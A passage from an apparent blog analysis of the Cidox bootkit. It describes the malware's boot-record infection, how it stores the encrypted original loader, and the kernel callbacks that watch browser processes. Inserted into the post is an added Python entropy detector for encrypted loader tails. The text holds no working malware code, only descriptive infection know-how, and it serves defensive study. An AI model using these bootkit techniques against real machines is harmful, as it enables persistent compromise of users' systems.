restart of the system. Immediately after this it creates a batch file that changes the
attributes of that small shutdown file and deletes it.</span></span><br />
<br />
<br />
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span></span><br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">BOOT LOADER</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"></span></span></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Cidox modifies the sector containing the active volume boot record (VBR) of an NTFS partition in order to load its rootkit. Once the malicious boot code is executed, it reads the malicious rootkit driver file from disk, transfers execution to it, and then resumes the normal boot sequence.</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1cIEVax-vqyknDWKyHflS3bSrN11scIZ7XqH4RbME7sIb5cYH9Nhrpq2AFUDAc0dvRKa-E_BRbb6kLZyt-5svimrz85J3dTXwABEhe64oiE1ccLbPmn5un7gASZKC4byygVE_6UR3dFY/s1600/mbrinfected.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1cIEVax-vqyknDWKyHflS3bSrN11scIZ7XqH4RbME7sIb5cYH9Nhrpq2AFUDAc0dvRKa-E_BRbb6kLZyt-5svimrz85J3dTXwABEhe64oiE1ccLbPmn5un7gASZKC4byygVE_6UR3dFY/s400/mbrinfected.jpg" width="400" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><i>Clean and infected copy of w32 infected partition</i></span></span></div>
</div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The original boot loader is stored, encrypted, at the end of the malicious boot loader. After the malicious rootkit driver has been loaded, the original loader is decrypted and Cidox passes execution to it so that the normal boot sequence continues. Below is a dump of the malicious boot loader; the highlighted hex bytes are the encrypted original loader.</span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6YZopF8ahHt9xxXJSS28T3rUSAiogUSR5dFPOeOLpn-xtFvj9z2sNM-HRGLv5xn3gMfvTXpkJLMwhwJ2c6ZI66IrOh8UT1nnKlBtxE1QtgmvppjCVJF5ZRGOB_Agn_BZop_kJYJg1wg/s1600/origencrypted.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6YZopF8ahHt9xxXJSS28T3rUSAiogUSR5dFPOeOLpn-xtFvj9z2sNM-HRGLv5xn3gMfvTXpkJLMwhwJ2c6ZI66IrOh8UT1nnKlBtxE1QtgmvppjCVJF5ZRGOB_Agn_BZop_kJYJg1wg/s320/origencrypted.jpg" width="320" /></a></div>
<div class="MsoNormal" style="line-height: normal; text-align: center;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><i>Highlighted is the encrypted loader </i></span></div>
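As an added defensive example (not code from the original post), the Python below scores a boot-loader image sector by sector with Shannon entropy and flags the trailing high-entropy run that an encrypted original loader appended to the malicious loader produces. The sample images, the loader byte pattern and the SHA-256 keystream used to fabricate the ciphertext are all constructed for the demo and are not Cidox's own bytes or cipher.

```python
import hashlib
import math
from collections import Counter

SECTOR = 512


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0 for constant data, up to 8 for
    uniformly random (or well-encrypted) data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_profile(image: bytes, window: int = SECTOR) -> list:
    """Entropy of every fixed-size window of the image, first to last.
    A short final window cannot reach 8 bits, so keep windows >= 256 bytes."""
    return [shannon_entropy(image[i:i + window])
            for i in range(0, len(image), window)]


def find_encrypted_tail(image: bytes, window: int = SECTOR,
                        threshold: float = 7.0):
    """Return the offset where the trailing run of high-entropy windows
    begins, or None when the image ends in ordinary code or padding.

    Real-mode boot code and its zero padding score far below 7 bits/byte;
    a ciphertext blob appended after the code, which is how the post says
    the original loader is kept, scores close to 8 whatever the cipher.
    """
    profile = entropy_profile(image, window)
    start = None
    for idx in range(len(profile) - 1, -1, -1):
        if profile[idx] < threshold:
            break
        start = idx * window
    return start


# ---- constructed sample data: none of this is taken from a Cidox sample ----

def keystream(key: bytes, length: int) -> bytes:
    """Hypothetical SHA-256 counter-mode keystream used only to fabricate
    a ciphertext blob for the demo; it is not Cidox's encryption scheme."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "little")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def fake_loader_code(length: int) -> bytes:
    """Stand-in for boot code: a short instruction-like byte pattern repeated
    over the first half, then zero padding, giving the low entropy that real
    loader code has. The pattern is a constructed example, not Cidox bytes."""
    pattern = bytes.fromhex("fa33c08ed0bc007cfb8ed88ec0b80000")
    half = length // 2
    code = (pattern * (half // len(pattern) + 1))[:half]
    return code + b"\x00" * (length - half)


ORIGINAL_LOADER = fake_loader_code(4 * SECTOR)
MALICIOUS_LOADER = fake_loader_code(3 * SECTOR)
# Infected layout described in the post: malicious loader first, then the
# original loader encrypted and appended at the end.
INFECTED_IMAGE = MALICIOUS_LOADER + xor_bytes(
    ORIGINAL_LOADER, keystream(b"demo-key", len(ORIGINAL_LOADER)))


if __name__ == "__main__":
    for name, image in (("clean", ORIGINAL_LOADER), ("infected", INFECTED_IMAGE)):
        tail = find_encrypted_tail(image)
        profile = " ".join(f"{e:.2f}" for e in entropy_profile(image))
        print(f"{name:8s} entropy/sector: {profile}")
        print(f"{name:8s} encrypted tail at: "
              f"{'none' if tail is None else hex(tail)}")
```

Run the same profile over a dump of the real boot code: a tail scoring near 8 bits per byte where code or padding is expected is the region to pull for closer inspection.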
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">ROOTKIT</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;; font-size: 12.0pt; mso-fareast-font-family: &quot;Times New Roman&quot;;">The Cidox
rootkit driver installs its hooks by registering callbacks through the following kernel routines:</span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"> </span></div>
<ul type="disc">
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,&quot;Times New Roman&quot;,serif;"><span style="font-size: 12pt;">PsSetLoadImageNotifyRoutine</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,&quot;Times New Roman&quot;,serif;"><span style="font-size: 12pt;">PsSetCreateProcessNotifyRoutine</span></span></li>
</ul>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggumhjs-LaG0rLHNsgZxESWfRZHu7PdP_WIJ4ppodS9EDv-vAYFBupGkHUTPUK_SaYDn3mlWAuLaKR0XNAzNWOomWdvDHPlvSXP_-JV8c-mKep6JndWQiGNj2ut4SKg3MwsCYpXiWgUIE/s1600/hookcallback.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggumhjs-LaG0rLHNsgZxESWfRZHu7PdP_WIJ4ppodS9EDv-vAYFBupGkHUTPUK_SaYDn3mlWAuLaKR0XNAzNWOomWdvDHPlvSXP_-JV8c-mKep6JndWQiGNj2ut4SKg3MwsCYpXiWgUIE/s400/hookcallback.jpg" width="400" /></a></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><i>Driver loaded in memory</i></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
</w:LatentStyles>
</xml><![endif]-->
</span><br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">These
functions are called whenever an image is loaded or a process is created,
respectively. The handler for each hook checks whether it is being called in any
of the processes listed below.</span></span></div>
<ul type="disc">
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">iexplore.exe </span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">firefox.exe</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">chrome.exe</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">safari.exe</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">opera.exe</span></li>
